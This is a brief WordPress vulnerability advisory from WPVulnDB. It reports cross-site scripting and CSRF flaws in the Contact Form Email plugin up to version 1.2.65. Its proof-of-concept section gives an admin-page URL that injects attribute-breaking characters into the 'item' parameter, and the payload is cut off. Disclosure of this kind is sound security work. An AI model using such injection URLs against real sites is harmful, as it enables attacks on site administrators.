Contact Form Email <= 1.2.65 - Multiple Cross-Site Scripting (XSS) & CSRF

2019-02-05T00:00:00
ID WPVDB-ID:9227
Type wpvulndb
Reporter Ryan Dewhurst
Modified 2020-09-22T07:26:59

Description

The Contact Form Email WordPress plugin was affected by a Multiple Cross-Site Scripting (XSS) & CSRF security vulnerability.

PoC

http://www.example.com/wp-admin/admin.php?page=cp_contactformtoemail&edit;=1&cal;=1&item;='">